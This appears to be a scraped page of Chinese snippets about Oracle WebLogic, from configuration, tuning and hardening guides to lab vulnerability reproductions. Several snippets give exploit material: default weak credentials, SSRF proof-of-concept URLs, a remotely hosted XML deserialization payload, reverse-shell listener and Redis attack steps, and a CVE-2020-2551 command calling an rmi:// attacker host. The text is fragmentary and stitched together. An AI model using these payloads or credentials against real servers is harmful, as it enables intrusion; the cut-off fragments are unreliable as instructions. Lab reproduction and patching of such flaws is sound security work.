Weblogic 懂？

#!/usr/bin/python import socket import os import sys import struct import time if len(sys.argv) < 2: print 'Usage: python %s <TARGET_HOST> <PORT>' % os.path.basename(sys.argv[0]) sys.exit() sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

weblogic错误WebLogic Server is already using this directory.

weblogic.server.ServiceFailureException: Could not obtain an exclusive lock to /ainbs_proxy/ldap/ldapfiles because another WebLogic Server is already using this directory. Ensure that the first WebLogic Server is completely shutdown and restart the server. at weblogic.ldap.EmbeddedLDAP.ensureExclusiveAccess (EmbeddedLDAP.java:960) at weblogic.ldap.EmbeddedLDAP.initialize(EmbeddedLDAP.java:222) at weblogic.t3 weblogic.t3.srvr.T3Srvr.run(T3Srvr.java:343) at weblogic.Server.main(Server.java:32) > *************

weblogic EJB 学习

可能会发生并发现象，产生RemoteException weblogic 的<allow-concurrent-calls> 可以封锁任何并发的调用。 另外,bean作者可以增加另外一个cmp配置描述文件 weblogic-cmp-rdbms.xml,其中包含数据库表名和每个容器管理的字 段和相应的数据列的映射. (注释) <weblogic-ejb-jar> <weblogic-enterprise-bean> <ejb-name>HelloWorld（ejb名称）</ejb-name> <jndi-name > </weblogic-ejb-jar> 4 . （weblogic服务器配置描述器） 说明： META-INF 必须为大写 5 .

weblogic漏洞复现

系统下root用户的cron文件/var/spool/cron/crontabs/root debian系统下root用户的cron文件CVE-2017-10271(XML Decoder反序列化)简介Weblogic 漏洞环境https://github.com/vulhub/vulhub启动环境docker-compose up -d启动如下漏洞复现输入此命令即可查看weblogic用户密码，密码随机，请自行docker 使用这两个漏洞组成的利用链，可通过一个GET请求在远程Weblogic服务器上以未授权的任意用户身份执行命令。 版本都是通杀那么此方法利用方式首先需要构造一个XML文件，并将其保存在weblogic可以访问到的服务器上，如http://110.41.41.14/rce.xml:<? </list> </constructor-arg> </bean></beans>复制我们vps直接使用python搭建简单http服务然后通过如下URL，即可让weblogic

Weblogic SSRF漏洞

1.漏洞描述 weblogic中存在SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi等脆弱组件。 2.影响版本 weblogic 10.0.2 – 10.3.6版本 3.POC http://192.168.42.145:7001/uddiexplorer/SearchPublicRegistries.jsp %0D%0A%0D%0Aqwezxc 4.漏洞环境 靶机：192.168.42.145 Redis容器：172.25.0.2 Kali：192.168.42.138 5.漏洞复现 切换到vulhub/weblogic /ssrf文件夹 docker-compose up –d下载weblogic漏洞环境 访问Weblogic http://192.168.42.145:7001/console/login/LoginForm.jsp 方法三采用的是改后辍的方式，修复步骤如下： 1)将weblogic安装目录下的wlserver_10.3/server/lib/uddiexplorer.war做好备份； 2）将weblogic

weblogic漏洞复现

文章源自【字节脉搏社区】-字节脉搏实验室 作者-Jadore weblogic之weak_password Vul:弱口令可导致上传并部署war包获取WEBSHELL WebLogic常用弱口令： ? 用户名密码分别为：weblogic/Oracle@123，上传war包即可获得webshell 其他思路： https://github.com/vulhub/vulhub/blob/master/weblogic /weak_password/README.md weblogic之SSRF Vul:Weblogic中存在一个SSRF漏洞，利用该漏洞可以发送任意HTTP请求，进而攻击内网中redis、fastcgi https://github.com/vulhub/vulhub/blob/master/weblogic/ssrf/README.md 反弹shell格式： ? nc -l -p 8888监听即可 weblogic之XMLDecoder反序列化漏洞（CVE-2017-10271） Vul:Weblogic的WLS Security组件对外提供webservice

Weblogic漏洞修复

方案1：更新最新版本或安装最新补丁 可参考官方说明：https://www.oracle.com/security-alerts/cpuapr2020.html l Oracle WebLogic Server 10.3.6.0.0 l Oracle WebLogic Server 12.1.3.0.0 l Oracle WebLogic Server 12.2.1.3.0 l Oracle WebLogic 进入WebLogic控制台，在 base_domain配置页面中，进入安全选项卡页面，点击筛选器，配置筛选器； 2）. 在连接筛选器中输入： weblogic.security.net.ConnectionFilterImpl，在连接筛选器规则框中输入： 127.0.0.1 * * allow t3 t3s 保存后若规则未生效，建议重新启动Weblogic服务（重启Weblogic服务会导致业务中断，建议相关人员评估风险后，再进行操作） 2、禁止启用IIOP： 登陆Weblogic控制台，找到启用IIOP

Weblogic渗透测试指南

About WebLogic WebLogic是美商Oracle的主要产品之一，系购并得来。 而此产品也延伸出WebLogic Portal, WebLogic Integration等企业用的中间件（但目前Oracle主要以Fusion Middleware融合中间件来取代这些WebLogic 常开放于7001/7002端口 漏洞环境来自于vulhub https://github.com/vulhub/vulhub/tree/master/weblogic weak_password 访问/ 这里提供了两种方法进行进入后台，一个是弱口令，还有就是配合任意文件读取破解密码 弱口令的话没什么技巧可言，但也是实战中比较重要的一种方式，这里账号密码为 账号：weblogic 密码：Oracle@123 和之前一样，需要weblogic开启T3协议 nmap -n -v -Pn -sV 192.168.85.144 --script=weblogic-t3-info.nse 需要一些准备的工具，具体可看这里

tomcat weblogic 对比

WebLogic是美国bea公司出品的一个application server，确切的说是一个基于Javaee架构的中间件，纯java开发的，最新版本WebLogic Server 9.0是迄今为止发布的最卓越的 BEA WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。 （三）不同点： 　　功能性： 　　WebLogic更加强大。 扩展性： 　　用WebLogic运行标准的java可能并不是最好的方式，WebLogic里支持他自己的一些东西，这些东西虽然是在纯java基础上开发的，但其他工具里都没有。 这是其它Web应用系统所不具备的 所以，在扩展性方面WebLogic是远远超越了Tomcat。 　　费用上： 　　Tomcat开源免费。 　　WebLogic不开源不免费。 　　

java学习：weblogic下JNDI及JDBC连接测试(weblogic环境)

可以把任何类型的value，放入这个容器（通过bind/rebind方法）；其它地方需要使用该资源时，根据key就能取出该资源（通过lookup方法） JNDI使用示例： package jmyang.weblogic ; /** *

Title:JNDI示例(WebLogic环境)

Description:

Copyright: Copyright (c) 2012 JDBC数据源，实际上，也是使用JNDI服务来访问的，下面是JDBC示例代码:(必须先在weblogic中创建数据源) package jmyang.weblogic; /** *

Title :JDBC示例(WebLogic环境)

Description:

Copyright: Copyright (c) 2012

Company 服务器地址 static final String webLogicINDIStr = "weblogic.jndi.WLInitialContextFactory";

Weblogic环境安装部署

#groupadd weblogic #useradd -g weblogic -d /app/weblogic weblogic #chown -R weblogic:weblogic /app 通过 # chown -R weblogic:weblogic /app #cd /app/weblogic #chmod 700 wls1036_generic.jar 安装jdk #cp /root/jdk 1|WebLogic Server: [/app/weblogic/wlserver_10.3] 2|Oracle Coherence: [/app/weblogic/coherence ->1|创建新的 WebLogic 域 | 在您的项目目录中创建 WebLogic 域。 Enter username to boot WebLogic server:weblogic（用户名） Enter password to boot WebLogic server:12345678（

Weblogic相关漏洞复现

欢迎关注我的公众号《壳中之魂》，观看更多网安文章 弱口令 版本：全版本 常见账号密码搭配 system:password weblogic:weblogic admin:secruity joe:password : 搜集了市面上绝大部分weblogic解密方式，整理了7种解密weblogic的方法及响应工具。 攻击者利用其他rmi绕过weblogic黑名单限制，然后在将加载的内容利用readObject解析，从而造成反序列化远程代码执行该漏洞，该漏洞主要由于T3服务触发，所有开放weblogic控制台7001 /weblogic_CVE_2020_2551.jar 172.18.0.2 7001 rmi://192.168.3.45:7777/exp 不过我这里报错了，没有执行命令 Weblogic反序列化 //WEB-INF/weblogic.xml

weblogic mime-type

Weblogic服务器在处理各种类型的文件时，没有Tomcat智能。经常无法识别一些类型的文件，像.htc;.doc;.ppt等。 则需要配置weblogic的mime-mapping web.xml中配置参考样例： view plaincopy to clipboardprint?

Weblogic性能优化（图解）

分类：Weblogic （2034） （1） 若是觉得对您有一丢丢的帮助，烦请顶一下哦，激励我码出更多的帖子，^_^谢谢！ 1、数据源性能优化 1、1连接池参数配置 登录weblogic控制台,占击“connection pool”按钮进入数据库连接池配置页面。 下TCP连接数的调整 进入weblogic控制台，点击左边选项树中的servers选项 点击servers下的服务列表中的服务 点击“Tuning”进入页面 ”Accpet Backing”选项， 将后面的“50“ 修改为300－500，修改本选项的目的是增加tcp的连接，避免连接数满后，weblogic提示连接错误。 ************************* 关于更多Weblogic的资料，欢迎大家给我连接地址。

Weblogic下配置HTTPS

Weblogic下配置HTTPS步骤如下： 0.准备工作 制作配置https所需文件，server.jks servertrust.jks，上传至服务器 划重点：制作教程，点击这里 【 Linux下制作HTTPS证书 】 1.登录weblogic控制台 ? 7.保存配置，重启weblogic即可 附: keytool命令查看jks文件信息 keytool -list -rfc -keystore C:\Users\LiuBin\Desktop\

Weblogic介绍「建议收藏」

控制台管理 启动控制台 控制台中的各种图标 使用控制台设置基本属性 命令行管理 weblogic.Admin应用程序 Weblogic.Admin命令 ---- 介绍 Weblogic是一个服务器 ，可以做web服务器也可以做应用服务器 WebLogic是美国Oracle公司出品的一个Application Server，确切的说是一个基于JAVAEE架构的中间件，WebLogic是用于开发、集成 服务器 服务器是Java虚拟机（JVM）中执行的JAVA类weblogic.server的一个实例 服务器：至多与一个Weblogic Server机器相关联，有一些专用的RAM，是多线程的 JVM中执行 Weblogic Server当前的执行在：jdk-服务器;jdk-客户应用 2、Weblogic Server的依赖环境 要运行Weblogic Server，必须配置：path包括所有可执行程序 通过JAVA系统的classpath环境变量配置 使用命令行启动 通过运行weblogic.server类启动Weblogic Server 控制台管理 使用管理控制台： 1、配置资源属性 2

通过JMX监控weblogic服务

中间件软件WebLogic的管理页面就是基于JMX开发的，而JBoss则整个系统都基于JMX构架。 二、监控Weblogic 下面介绍下如何通过jmx获取监控信息。 serverRuntime, "WeblogicVersion"); strWLVersion=strWLVersion.substring(strWLVersion.lastIndexOf("WebLogic serverRuntime, "ActivationTime"); } catch (Exception e) { LOGGER.error("采集WebLogic

weblogic安全配置二三事

*本文原创作者：shewey，本文属FreeBuf原创奖励计划，未经许可禁止转载 1、引言 前段时间Java的反序列化漏洞吵得沸沸扬扬，因工作原因需要对weblogic进行安全配置，网上关于weblogic WLST（Weblogic Scripting Tool）weblogic脚本工具，如果你不想在console操作修改Weblogic的相关配置，可以试试用WLST。 可以用它来监视和管理Weblogic Server实例以及域。 Weblogic9.2版本中”C:\bea\weblogic92\common\bin\wlst.cmd”为WLST脚本工具。 Weblogic11g版本中在如下位置： ? 如果已经采用了默认的weblogic弱口令，则需要对密码进行修改，具体修改步骤如下： 1）登陆console管理控制台，修改密码。 2）进入%DOMAIN_HOME%/security目录，执行下列命令： | 运行java -cp/usr/local/bea/weblogic92/server/lib/weblogic.jar weblogic.security.utils.AdminAccount

Weblogic-SSRF漏洞复现

（使用file://协议读取本地文件） Weblogic中的这个环境就有点类似这个样子的，就是由于访问目标网站是的参数是url 这时就有可能存在ssrf漏洞，恰好在服务端验证请求时没有对用户请求做出严格的过滤以及限制 0x02开始复现，建立环境 这个环境我是通过虚拟机里搭建docker一个weblogic中的ssrf漏洞： 通过docker-compose up -d 来启动环境，根据作者的说明文件中按其步骤进行复现 通过错误的不同即可探测内网的状态首先，通过ssrf探测内网中的redis服务器（docker环境的网段一般是172.*），发现`172.20.0.2:6379`可以连通：， 注入HTTP头，利用Redis反弹shell Weblogic

weblogic的热部署

-- 如果设置为 true，当部署或重新部署 Web应用程序时，或启动 WebLogic时，WebLogic Server会自动预编译所有已修改的JSP。 -->08 <! ><weblogic-web-app xmlns="http://www.bea.com/ns/weblogic/90" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance 这个就是我今天要讲的weblogic的热部署。       Weblogic能实现热部署功能，而且有自己的热部署机制，一般的应用在Weblogic的控制台中有如下三个配置的页面：             servlet-reload-check-secs              为了实现程序的热部署，我们需要以下几个步骤： 1：修改weblogic的启动参数 使用domain中的startWebLogic.cmd来启动weblogic的话，则在domain/bin下的setDomainEnv.cmd